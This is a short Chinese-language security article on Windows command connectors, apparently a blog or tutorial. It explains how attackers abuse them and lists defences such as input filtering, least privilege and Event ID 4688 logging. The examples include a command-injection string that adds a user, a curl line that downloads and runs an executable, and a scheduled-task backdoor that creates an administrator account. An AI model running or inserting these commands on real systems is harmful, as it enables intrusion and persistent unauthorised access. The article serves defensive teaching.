1. 命令连接符简介

在 Windows 的命令行环境（CMD/PowerShell）中，命令连接符用于在同一行执行多个命令，提高效率。然而，攻击者常利用这些符号构造恶意命令，绕过安全检测或执行多阶段攻击。

常见命令连接符

符号	作用	示例
&	顺序执行多个命令	dir & whoami
&&	前一个命令成功才执行下一个	ping 127.0.0.1 && ipconfig
|	管道符，前一个命令的输出作为后一个的输入	dir | find "txt"
||	前一个命令失败才执行下一个	ping 1.1.1.1 || net user
;	PowerShell 中的命令分隔符	dir;whoami

---

2. 信息安全风险

（1）命令注入攻击（Command Injection）

攻击者可能通过输入拼接恶意命令，例如：

ping example.com & net user test /add

如果某程序未过滤用户输入，直接拼接命令执行，可能导致系统被入侵。

(图：攻击者利用&注入恶意命令)

（2）绕过安全检测

某些安全软件仅检测单条命令，攻击者可通过连接符拆分命令：

curl  http://test.com/7z.exe  -O && 7z.exe

（3）隐蔽后门

攻击者可能利用计划任务+连接符建立持久化后门：

schtasks /create /tn "Update" /tr "powershell -c 'net user backdoor P@ssw0rd /add; net localgroup administrators backdoor /add'" /sc hourly

;确保两条命令连续执行，直接提权。

---

3. 防御措施

（1）输入过滤与转义

• 在代码中调用命令行时，禁止直接拼接用户输入。

• 使用白名单机制，仅允许特定字符。

（2）最小权限原则

• 应用程序以低权限账户运行，避免Administrator执行高危命令。

（3）日志监控

• 启用Windows Event Log记录命令行操作（Event ID 4688）。

• 使用SIEM工具（如Splunk）分析异常命令。

推荐阅读：Windows计划任务持久化攻击分析与防御指南